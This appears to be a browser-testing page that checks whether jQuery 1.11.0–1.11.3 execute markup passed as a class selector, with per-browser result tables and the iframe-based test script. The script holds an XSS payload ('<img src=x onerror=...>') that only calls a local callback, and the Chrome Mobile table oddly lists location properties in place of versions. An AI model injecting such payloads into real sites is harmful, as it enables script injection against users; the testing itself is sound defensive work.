jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')

List of all jQuery versions vulnerable to class selector XSS. These jQuery libraries cause DOM XSS when a user-controlled value is passed as the class selector [$('.' + className)]. The results recorded below cover only the versions listed in the Enum Data section.

By
hbkninad 0 Seen 1528 times
Tags
jquery xss

Results


Tested on
Chrome - 73 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
Firefox - 61 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.0Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.3Safe

Tested on
Googlebot - 2.1 - undefined
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
IE - 11 - Windows 7
jQuery VersionIs it Vulnerable?
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe
jQuery 1.11.3Safe

Tested on
Iceweasel - 38.2.1 - Linux
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
Chrome Mobile - 83 - Android
jQuery VersionIs it Vulnerable?
ancestorOriginsSome Error Occured
hostSome Error Occured
hrefSome Error Occured
originSome Error Occured
protocolSome Error Occured
hostnameSome Error Occured
portSome Error Occured
hashSome Error Occured
searchSome Error Occured
pathnameSome Error Occured
assignSome Error Occured
toStringSome Error Occured
reloadSome Error Occured
replaceSome Error Occured
valueOfSome Error Occured

Tested on
Opera - 47 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe
jQuery 1.11.3Safe

User Script (ENUM_FUNCTION)

					
// Custom Functions

// Version string of the jQuery build currently being probed. test() overwrites it
// on every call and vulnerable()/safe() read it when they report a verdict, so it
// is shared state: a verdict is labelled with whatever value is current when the
// callback finally runs.
var jQuery_version = "";
/**
 * Reports the jQuery version currently held in jQuery_version as vulnerable.
 *
 * Invoked from inside the test iframe as parent.vulnerable() when the markup
 * embedded in the probed selector string gets its event handler executed.
 *
 * NOTE(review): the verdict text contains <b> markup, so addError presumably
 * renders its arguments as HTML. If so, the label built from jQuery_version is
 * inserted unescaped. Confirm against the harness.
 */
function vulnerable(){
    var label = 'jQuery ' + jQuery_version;
    var verdict = '<b>Vulnerable</b>';
    addError(label, verdict);
}

/**
 * Reports the jQuery version currently held in jQuery_version as safe.
 *
 * Invoked from inside the test iframe as parent.safe() when the probed $() call
 * throws instead of turning the selector string into DOM nodes.
 */
function safe(){
    var label = 'jQuery ' + jQuery_version;
    var verdict = 'Safe';
    addSuccess(label, verdict);
}
    
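/**
 * Removes the test iframe (id 'jQueryFrameID') from the page.
 *
 * Called from inside the iframe as parent.removeIframe() once a verdict has been
 * reported. Every iframe created by test() carries the same id, so this removes
 * whichever matching element getElementById returns first.
 *
 * Does nothing when no such element exists or it is already detached. Without
 * this guard a second call would throw a TypeError inside the caller's handler.
 */
function removeIframe(){
    var frame = document.getElementById('jQueryFrameID');
    if (frame && frame.parentNode) {
        frame.parentNode.removeChild(frame);
    }
}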

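// Test Function
/**
 * Probes one jQuery version for class-selector XSS inside a throwaway iframe.
 *
 * Steps:
 *   1. Record the version in jQuery_version and append an iframe
 *      (id 'jQueryFrameID') to the page.
 *   2. When the iframe has loaded, load that version's jquery.js from
 *      ajax.googleapis.com inside it.
 *   3. When jQuery has loaded, inject an inline script that passes a
 *      class-selector string containing markup to $(). If the markup's event
 *      handler runs, the frame calls parent.vulnerable(). If $() throws, it calls
 *      parent.safe(). Both paths then call parent.removeIframe().
 *
 * If $() neither throws nor instantiates the markup, no verdict is reported and
 * the iframe is left in place.
 *
 * NOTE(review): data is concatenated into the CDN path without validation. This
 * assumes the enum data only ever holds plain version strings.
 *
 * @param {*} data jQuery version to probe, converted with toString() for the URL.
 */
function test(data){
    // This try/catch only covers the synchronous setup below. The load callbacks
    // run later, outside of it.
    try{
        jQuery_version = data;
        var jQueryFrame = document.createElement('iframe');
        jQueryFrame.id = 'jQueryFrameID';
        jQueryFrame.onload = function(){
            var frameDocument = jQueryFrame.contentWindow.document;
            var jQueryScript = frameDocument.createElement('script');
            jQueryScript.type = 'text/javascript';

            // Attach both handlers before the element is inserted, so neither
            // event can fire while no handler is registered.
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = frameDocument.createElement('script');
                exploit.type = 'text/javascript';
                // .text sets the script source as plain text, with no HTML parsing.
                exploit.text = exploitScript;
                frameDocument.body.appendChild(exploit);
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
                // Drop this frame on a failed load. All frames share one id, so a
                // stale frame would otherwise be the one a later removeIframe()
                // finds and removes.
                if (jQueryFrame.parentNode) {
                    jQueryFrame.parentNode.removeChild(jQueryFrame);
                }
            };

            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ data.toString() +'/jquery.js';
            frameDocument.body.appendChild(jQueryScript);
        };
        document.body.appendChild(jQueryFrame);
    }
    catch(err){
        addInfo(data ,  'Some Error Occured');
    }
}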
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// jQuery versions to probe, newest first. Presumably the harness passes each
// entry to test(); confirm against the platform.
// Version list taken from https://developers.google.com/speed/libraries/devguide#jquery
var data = [
    '1.11.3',
    '1.11.2',
    '1.11.1',
    '1.11.0'
];